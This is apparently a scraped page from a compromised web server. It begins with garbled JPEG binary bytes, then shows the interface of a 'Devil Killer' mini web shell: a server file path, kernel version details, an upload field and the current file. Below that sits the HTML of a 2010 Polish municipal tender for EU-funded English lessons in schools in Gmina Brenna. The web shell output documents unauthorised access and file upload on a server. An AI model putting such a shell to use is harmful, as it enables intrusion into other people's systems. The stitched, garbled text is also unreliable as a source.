JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20101119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20101119/375520-N-2010.html

<p class="kh_header"><b>Brenna: Zajęcia z języka angielskiego, miłośników kultury amerykańskiej i brytyjskiej, język angielski przygotowujący do wymiany z Holandią w ramach projektu pn. Nasze dzieci - Nasza przyszłość współfinansowanego ze środków Unii Europejskiej przez Europejski Fundusz Społeczny Podziałanie 9.1.2 POKL w szkołach na terenie gminy Brenna</b><br>
<b>Numer ogłoszenia: 375520 - 2010; data zamieszczenia: 19.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Brenna , ul. Wyzwolenia 77, 43-438 Brenna, woj. śląskie, tel. 033 8536222, faks 033 8536370.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brenna.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zajęcia z języka angielskiego, miłośników kultury amerykańskiej i brytyjskiej, język angielski przygotowujący do wymiany z Holandią w ramach projektu pn. Nasze dzieci - Nasza przyszłość współfinansowanego ze środków Unii Europejskiej przez Europejski Fundusz Społeczny Podziałanie 9.1.2 POKL w szkołach na terenie gminy Brenna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	 Przedmiotem zamówienia jest przeprowadzenie zajęć z języka angielskiego, miłośników kultury amerykańskiej i brytyjskiej, język angielski przygotowujący do wymiany z Holandią w ramach projektu pn. Nasze dzieci - Nasza przyszłość współfinansowanego ze środków Unii Europejskiej przez Europejski Fundusz Społeczny Podziałanie 9.1.2 POKL w szkołach na terenie gminy Brenna 

Zadanie 1 
Prowadzenie zajęć grupowych z języka angielskiego dla uczniów klas 4 -6 Szkoły Podstawowej przy Zespole Szkół Publicznych w Górkach Wielkich (tj. 137 godzin dydaktycznych w tym w roku szkolnym 2010/2011 - 76 godzin, w roku szkolnym 2011/2012 - 61 godziny) poprzez:
-	uzupełnianie braków programowych,
-	rozwijanie wiary we własne możliwości poprzez nabycie umiejętności komunikowania się w języku obcym,
-	możliwość nadrobienia zaległości językowych
-	powtórzenie programu nauczania,
-	wzbudzanie i umacnianie motywacji do nauki języka obcego.

Zadanie 2 
Prowadzenie zajęć grupowych z języka angielskiego dla uczniów klas 4 -6 Szkoły Podstawowej przy Zespole Szkół Publicznych w Górkach Wielkich (tj. 135 godzin dydaktycznych w tym w roku szkolnym 2010/2011 - 52 godzin, w roku szkolnym 2011/2012 - 83 godziny) poprzez:
-	uzupełnianie braków programowych,
-	rozwijanie wiary we własne możliwości poprzez nabycie umiejętności komunikowania się w języku obcym,
-	możliwość nadrobienia zaległości językowych
-	powtórzenie programu nauczania,
-	wzbudzanie i umacnianie motywacji do nauki języka obcego.

Zadanie 3 
Prowadzenie zajęć grupowych z języka angielskiego przygotowujący do wymiany z Holandią dla uczniów Gimnazjum przy Zespole Szkół Publicznych w Górkach Wielkich (tj. 69 godzin dydaktycznych w tym w roku szkolnym 2010/2011 - 33 godzin, w roku szkolnym 2011/2012 - 36 godziny.) poprzez:
-	poznanie i umiejętne wykorzystanie zdobywanych umiejętności językowych,
-	swobodne porozumiewanie się w języku obcym,
-	ćwiczenie umiejętności słuchania ze zrozumieniem i efektywnego porozumiewania się,
-	poznanie kultury holenderskiej.

Zadanie 4 
Prowadzenie zajęć grupowych z języka angielskiego przygotowujący do wymiany z Holandią dla uczniów Gimnazjum przy Zespole Szkół Publicznych w Górkach Wielkich (tj. 67 godzin dydaktycznych w tym w roku szkolnym 2010/2011 - 31 godzin, w roku szkolnym 2011/2012 - 36 godziny) poprzez:
-	poznanie i umiejętne wykorzystanie zdobywanych umiejętności językowych,
-	swobodne porozumiewanie się w języku obcym,
-	ćwiczenie umiejętności słuchania ze zrozumieniem i efektywnego porozumiewania się,
-	poznanie kultury holenderskiej.

Zadanie 5
Prowadzenie zajęć grupowych z języka angielskiego dla uczniów Gimnazjum przy Zespole Szkół Publicznych w Górkach Wielkich (tj. 103 godzin dydaktycznych w tym w roku szkolnym 2010/2011 - 61 godzin, w roku szkolnym 2011/2012 - 42 godziny) poprzez:
-	rozwijanie zainteresowań uczniów,
-	pogłębianie wiedzy,
-	kształcenie i doskonalenie umiejętności posługiwania się językiem obcym.

Zadanie 6 
Prowadzenie zajęć grupowych z języka angielskiego dla uczniów Gimnazjum przy Zespole Szkół Publicznych w Górkach Wielkich (tj. 101 godzin dydaktycznych w tym w roku szkolnym 2010/2011 - 35 godzin, w roku szkolnym 2011/2012 - 66 godziny) poprzez:
-	rozwijanie zainteresowań uczniów,
-	pogłębianie wiedzy,
-	kształcenie i doskonalenie umiejętności posługiwania się językiem obcym.

2.	Zajęcia muszą być zgodne z podstawą programową zgodną z Rozporządzeniem Ministra Edukacji Narodowej z dnia 23 grudnia 2008r.(Dz.U. z dn.15.01.2009r. Nr 4 poz.17).
3.	Szczegółowy harmonogram zajęć będzie uzgadniany przez Dyrektora Szkoły z wyłonionym Wykonawcą usługi po podpisaniu umowy.
4.	Przed przystąpieniem do realizacji usługi Wykonawca przygotuje scenariusze zajęć z języka angielskiego.
5.	Wykonawca jest zobowiązany do prowadzenia dziennika zajęć zawierającego listę imienną dzieci uczestniczących w zajęciach i tematykę zajęć. Wpisy w dzienniku muszą być potwierdzane przez osoby wyznaczone przez Dyrektora Szkoły. Strona tytułowa dziennika musi być opatrzona kolorowymi logo Programu Operacyjnego Kapitał Ludzki, logo Unii Europejskiej oraz sformułowaniem Projekt pn. Nasze dzieci - Nasza przyszłość współfinansowanego ze środków Unii Europejskiej przez Europejski Fundusz Społeczny .
6.	Wykonawca przekazuje Zamawiającemu oryginał dziennika zajęć po zakończeniu każdego warsztatu.
7.	Zamawiający zapewni materiały dydaktyczne niezbędne do prowadzenia zajęć. Spis materiałów dydaktycznych znajduje się w siedzibie Zamawiającego, który jest dostępny po uprzednim uzgodnieniu telefonicznym z koordynatorem projektu.

Oferent będący osobą fizyczną uwzględnia w cenie ofertowej wszystkie składniki wynagrodzenia (ponoszone przez wykonawcę i zleceniodawcę) zgodnie z obowiązującymi przepisami w tym zakresie.
Oferent będący przedsiębiorcą uwzględnia w cenie ofertowej wszystkie koszty, które musi ponieść w związku z realizacją usługi..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonali lub wykonują min. 1 usługę polegającą na prowadzeniu zajęć z j. angielskiego dla dzieci w wieku 7-16 lat</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują osobami z uprawnieniami, posiadającymi min. wykształcenie wyższe kierunkowe, przygotowanie pedagogiczne, doświadczenie zawodowe w zakresie prowadzenia zajęć z j. angielskiego dla dzieci w wieku 7- 16 lat min 3 letnie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1/ Formularz oferty według załączonego wzoru (załącznik nr 1). 2/ Oświadczenie, o którym mowa w art. 22 ust. 1 ustawy p.z.p. (załącznik nr 2). 3/ Oświadczenie o nie podleganiu wykluczeniu z postępowania o udzielenie zamówienia o którym mowa w art. 24 ust.1 i 2, Prawa zamówień publicznych, wg wzoru stanowiącego Załącznik Nr 3 do SIWZ. W przypadku podmiotu innego niż Wykonawca, udostępniającego osoby zdolne do wykonania zamówienia, należy przedłożyć pisemną zobowiązanie tych podmiotów do oddania mu osób zdolnych do wykonania zamówienia 8/ Wykaz Podwykonawców oraz zgodę Podwykonawców na wykonanie określonej części zamówienia - jeżeli dotyczy ( załącznik nr 6 )</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Działając zgodnie z Art. 144 ust.1 ustawy Prawo Zamówień Publicznych, Zamawiający dopuszcza możliwość zmiany treści umowy w stosunku do oferty w szczególności w przypadkach: 1/ Zmian ogólnych: a)zmiany będące skutkiem poprawy oczywistej pomyłki pisarskiej bądź rachunkowej, b) zmiany stanu prawnego, mające wpływ na realizację przedmiotu zamówienia, 2/ Zmian wpływających na termin wykonania umowy: a) możliwe jest przedłużenie terminu zakończenia umowy o czas opóźnienia, jeżeli opóźnienie to wynika z przyczyn leżących po stronie Zamawiającego lub jest efektem działania siły wyższej lub przyczyn obiektywnych niezależnych od Wykonawcy. 3/ Zmian wpływających na wynagrodzenie: a) możliwa jest zmiana postanowień umowy, w związku ze zmianą stawki podatku od towarów i usług ( VAT ) 4/ Innych zmian - z zastrzeżeniem art. 140 ust. 3 ustawy Prawo Zamówień Publicznych 2. Zmiany zawartej umowy wymagają pisemnego uzasadnienia, sporządzonego przez komisję powołaną przez Zamawiającego, w skład której wejdzie Inspektor Nadzoru i przedstawiciel Wykonawcy, zatwierdzonego przez Zamawiającego. Zmiana umowy wymaga, pod rygorem nieważności, zachowania formy pisemnej. 3.Zamawijący zastrzega sobie prawo odstąpienia od umowy w przypadkach wskazanych w umowie i ustawie oraz gdy: 1/ zostanie ogłoszona likwidacja Wykonawcy, 2/ Wykonawca nie rozpoczął realizacji umowy w terminie zapewniającym ukończenie usługi zgodnie z umową, 3/ Wykonawca dopuścił się rażącego naruszenia innych istotnych postanowień umowy, 4/ Wykonawca przerwał realizację usługi z przyczyn leżących po jego stronie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.brenna.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Brennej ul. Wyzwolenia 77 43-438 Brenna pok. 26..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.11.2010 godzina 11:30, miejsce: Urząd Gminy w Brennej ul. Wyzwolenia 77 43-438 Brenna pok. 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projektu pn. Nasze dzieci - Nasza przyszłość współfinansowanego ze środków Unii Europejskiej przez Europejski Fundusz Społeczny Podziałanie 9.1.2 POKL..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Prowadzenie zajęć grupowych z języka angielskiego dla uczniów klas 4 -6 Szkoły Podstawowej przy Zespole Szkół Publicznych w Górkach Wielkich (tj. 137 godzin dydaktycznych w tym w roku szkolnym 2010/2011 - 76 godzin, w roku szkolnym 2011/2012 - 61 godziny).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć grupowych z języka angielskiego dla uczniów klas 4 -6 Szkoły Podstawowej przy Zespole Szkół Publicznych w Górkach Wielkich (tj. 137 godzin dydaktycznych w tym w roku szkolnym 2010/2011 - 76 godzin, w roku szkolnym 2011/2012 - 61 godziny) poprzez:
-	uzupełnianie braków programowych,
-	rozwijanie wiary we własne możliwości poprzez nabycie umiejętności komunikowania się w języku obcym,
-	możliwość nadrobienia zaległości językowych
-	powtórzenie programu nauczania,
-	wzbudzanie i umacnianie motywacji do nauki języka obcego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Prowadzenie zajęć grupowych z języka angielskiego dla uczniów klas 4 -6 Szkoły Podstawowej przy Zespole Szkół Publicznych w Górkach Wielkich (tj. 135 godzin dydaktycznych w tym w roku szkolnym 2010/2011 - 52 godzin, w roku szkolnym 2011/2012 - 83 godziny).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć grupowych z języka angielskiego dla uczniów klas 4 -6 Szkoły Podstawowej przy Zespole Szkół Publicznych w Górkach Wielkich (tj. 135 godzin dydaktycznych w tym w roku szkolnym 2010/2011 - 52 godzin, w roku szkolnym 2011/2012 - 83 godziny) poprzez:
-	uzupełnianie braków programowych,
-	rozwijanie wiary we własne możliwości poprzez nabycie umiejętności komunikowania się w języku obcym,
-	możliwość nadrobienia zaległości językowych
-	powtórzenie programu nauczania,
-	wzbudzanie i umacnianie motywacji do nauki języka obcego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Prowadzenie zajęć grupowych z języka angielskiego przygotowujący do wymiany z Holandią dla uczniów Gimnazjum przy Zespole Szkół Publicznych w Górkach Wielkich (tj. 69 godzin dydaktycznych w tym w roku szkolnym 2010/2011 - 33 godzin, w roku szkolnym 2011/2012 - 36 godziny.).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć grupowych z języka angielskiego przygotowujący do wymiany z Holandią dla uczniów Gimnazjum przy Zespole Szkół Publicznych w Górkach Wielkich (tj. 69 godzin dydaktycznych w tym w roku szkolnym 2010/2011 - 33 godzin, w roku szkolnym 2011/2012 - 36 godziny.) poprzez:
-	poznanie i umiejętne wykorzystanie zdobywanych umiejętności językowych,
-	swobodne porozumiewanie się w języku obcym,
-	ćwiczenie umiejętności słuchania ze zrozumieniem i efektywnego porozumiewania się,
-	poznanie kultury holenderskiej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Prowadzenie zajęć grupowych z języka angielskiego przygotowujący do wymiany z Holandią dla uczniów Gimnazjum przy Zespole Szkół Publicznych w Górkach Wielkich (tj. 67 godzin dydaktycznych w tym w roku szkolnym 2010/2011 - 31 godzin, w roku szkolnym 2011/2012 - 36 godziny).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć grupowych z języka angielskiego przygotowujący do wymiany z Holandią dla uczniów Gimnazjum przy Zespole Szkół Publicznych w Górkach Wielkich (tj. 67 godzin dydaktycznych w tym w roku szkolnym 2010/2011 - 31 godzin, w roku szkolnym 2011/2012 - 36 godziny) poprzez:
-	poznanie i umiejętne wykorzystanie zdobywanych umiejętności językowych,
-	swobodne porozumiewanie się w języku obcym,
-	ćwiczenie umiejętności słuchania ze zrozumieniem i efektywnego porozumiewania się,
-	poznanie kultury holenderskiej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Prowadzenie zajęć grupowych z języka angielskiego dla uczniów Gimnazjum przy Zespole Szkół Publicznych w Górkach Wielkich (tj. 103 godzin dydaktycznych w tym w roku szkolnym 2010/2011 - 61 godzin, w roku szkolnym 2011/2012 - 42 godziny).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć grupowych z języka angielskiego dla uczniów Gimnazjum przy Zespole Szkół Publicznych w Górkach Wielkich (tj. 103 godzin dydaktycznych w tym w roku szkolnym 2010/2011 - 61 godzin, w roku szkolnym 2011/2012 - 42 godziny) poprzez:
-	rozwijanie zainteresowań uczniów,
-	pogłębianie wiedzy,
-	kształcenie i doskonalenie umiejętności posługiwania się językiem obcym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
